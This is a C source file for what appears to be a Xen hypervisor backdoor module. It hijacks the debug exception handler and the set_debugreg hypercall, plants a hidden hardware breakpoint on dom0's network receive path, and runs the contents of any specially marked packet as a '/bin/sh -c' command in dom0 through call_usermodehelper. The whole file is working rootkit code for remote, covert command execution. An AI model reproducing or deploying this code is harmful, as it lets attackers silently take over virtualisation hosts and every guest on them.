#include <stdint.h>
#include <xenlib.h>
#include <public/xen.h>
#include <xen/sched.h>
#include <asm-x86/current.h>
//#include "hdebug-tunables.h"
int (*orig_do_debug) (void *);
int hitcount = 0x77;
int lasteip = 0xaa;
int domain = 0x55;

extern void myhelper();
extern void hlpargstart();

char *scratch0 = 0;
int use_napi=0;
long hwbpaddr;
#define EXE "/bin/sh"
#define ARGC "-c"
struct args {
	void *a1;
	void *a2;
	void *a3;
	void *null;
	char exe[12];
	char argc[12];
};
#include "kallsyms.c"
void runcode(struct cpu_user_regs *regs, char *cmd, int count)
{
	char *data;
	int *helparg;
	struct args *p = (struct args *) scratch0;
	memcpy(scratch0 + sizeof(struct args), myhelper,
	       hlpargstart - myhelper);
	helparg = scratch0 + sizeof(struct args) + (hlpargstart - myhelper);
	data = (char *) (helparg + 7);
	memcpy(data, cmd, count);
	data[count] = 0;
	memcpy(p->exe, EXE, sizeof(EXE));
	memcpy(p->argc, ARGC, sizeof(ARGC));
	p->a1 = p->exe;
	p->a2 = p->argc;
	p->a3 = data;
	p->null = 0;
	helparg[0] = p->exe;
	helparg[1] = &(p->a1);
	helparg[2] = &(p->null);
	helparg[3] = call_usermodehelper_keys;
	helparg[4] = execute_in_process_context;
	helparg[5] = kfree_skb;
	helparg[6] = ksyms_memset;

	regs->eip = scratch0 + sizeof(struct args);

}

char packet[80];
#include "skbuff_offset.h"
void parse_data(struct cpu_user_regs *regs)
{
	static int count = 0;
	char *skbuff = regs->eax;
	unsigned int datalen;
	char *data;
	unsigned int val;

	if (xen_copy_from_user(&datalen, skbuff+skbuff_len_offset(), 4) ||
		xen_copy_from_user(&data, skbuff+skbuff_data_offset(), 4))
	return; // invalid pointers in skb	

//	memcpy(packet, data, 80); // for debugging
	
	if (xen_copy_from_user(&val, data+28, 4) || val!=0xaaaaaaaa ||
		xen_copy_from_user(&val, data+32, 4) || val!=0xbbbbbbbb)
	return; // not our packet
	
	xen_printk("ay ay, sire, skbuf=%p, len=%d\n", skbuff,
		   datalen - 36);
	if (datalen > 36 && !xen_copy_from_user(&val, data+datalen-4,4)) {
		runcode(regs, ((char *) data) + 36, datalen - 36);
	}
}

#ifndef EXCRET_not_a_fault
#define EXCRET_not_a_fault 0
#endif
int my_debug(struct cpu_user_regs *regs)
{
	struct vcpu *v = current;
	domain = current->domain->domain_id;
	lasteip = regs->eip;
	if (lasteip == hwbpaddr) {
		hitcount++;
		regs->eflags |= X86_EFLAGS_RF;

		if (domain == 0)
			parse_data(regs);
		return EXCRET_not_a_fault;
	} else
		return orig_do_debug(regs);
}
//long my_do_set_debugreg(int req, long val);
//void my_continue(struct vcpu*);
#include "../devel/hijack.c"
struct hijack hijack_do_set_debugreg, hijack_continue;

#define DR_array current->arch.guest_context.debugreg
#define load_legal_debug(_reg) \
    __asm__ __volatile__ ("mov %0,%%db" #_reg : : "r" (DR_array[_reg]))
#define load_custom_debug(val,_reg) \
    __asm__ __volatile__ ("mov %0,%%db" #_reg : : "r" (val))

#define MASK_ACT ((1<<6)|(1<<7))
#define MASK ((1<<6)|(1<<7)|(1<<22)|(1<<23)|(1<<30)|(1<<31))
#define MASKVAL ((1<<6)|(1<<7))
void init_dr()
{
	load_custom_debug(hwbpaddr, 3);
	load_custom_debug((DR_array[7]& ~MASK) | MASKVAL, 7);
}
int set_db_in=0;
long my_do_set_debugreg(int req, long val)
{
	long newval = val;
	long ret;
	long (*orig) (int req, long val) =
	    get_hijack_tramp(&hijack_do_set_debugreg);
	ret= orig(req, val);
	set_db_in++;
	if (current->domain->domain_id)
		return ret;
	if (req == 3) {
		if (! (DR_array[7]&MASK_ACT))
			load_custom_debug(hwbpaddr, 3);
	}
	if (req == 7) {
		if (! (DR_array[7]&MASK_ACT)) {
			init_dr();
		} else {
			load_legal_debug(3);
		}
	}	
	return ret;	
}

#include "prefixes.h"
#if 0
static void (*orig_ctxt_switch_to)(struct vcpu *v);
int ctx_on=0;
int ctx_off=0;
void my_ctxt_switch_to(struct vcpu *v)
{
	orig_ctxt_switch_to(v);
        if (! (DR_array[7]&MASK_ACT)) {
                                init_dr();
                                ctx_on++;
        }
        else ctx_off++;
}	
#endif
#define DBPATH arch.guest_context.debugreg
int ctx_on=0;
int ctx_off=0;
int bad7=0;
int bad3=0;
int val7;
void my_continue(struct vcpu*v)
{
        void (*orig) (struct vcpu*v) =
                    get_hijack_tramp(&hijack_continue);
        if (!(v->domain->domain_id) && !(v->DBPATH[7]&MASK_ACT)) {
        	        load_custom_debug(hwbpaddr, 3);
        	        load_custom_debug((v->DBPATH[7]& ~MASK) | MASKVAL, 7);
			ctx_on++;
	}else {
		ctx_off++;
		bad7=v->DBPATH[7];
		bad3=v->DBPATH[3];
		__asm__ __volatile__ ("mov %%db7, %0" : : "r" (val7));
		
		
	}
	orig(v);
}        	        
        	                
int init_module()
{
	unsigned long sch=current->arch.schedule_tail;
	if (!scratch0) {
		xen_printk("give proper scratch0 param to the xen module\n");
		return -EINVAL;
	}
	if (sch&0xff100000!=0xff100000) {
		xen_printk("suspicious schedule tail=0x%x\n", sch);
		return -EFAULT;
	}
	if (use_napi) 
		hwbpaddr=netif_receive_skb;
	else
		hwbpaddr=netif_rx;
	orig_do_debug = exception_table[1];
	exception_table[1] = my_debug;
	init_hijack(&hijack_do_set_debugreg, hypercall_table[__HYPERVISOR_set_debugreg],
		my_do_set_debugreg, do_set_debugreg_prefix);
	do_hijack(&hijack_do_set_debugreg);
	init_hijack(&hijack_continue, current->arch.schedule_tail,
		my_continue, schedule_tail_prefix);
	do_hijack(&hijack_continue);
//	orig_ctxt_switch_to=current->arch.ctxt_switch_to;
//	current->arch.ctxt_switch_to=my_ctxt_switch_to;
	                if (! (DR_array[7]&MASK_ACT)) {
                                init_dr();
                        }else xen_printk("upon load, dr7 active\n");
	return 0;
}

void cleanup_module()
{
	undo_hijack(&hijack_continue);
	undo_hijack(&hijack_do_set_debugreg);
	 if (! (DR_array[7]&MASK_ACT)) {
	 load_legal_debug(7);
	 load_legal_debug(3);
	 }
	
	exception_table[1] = orig_do_debug;
}
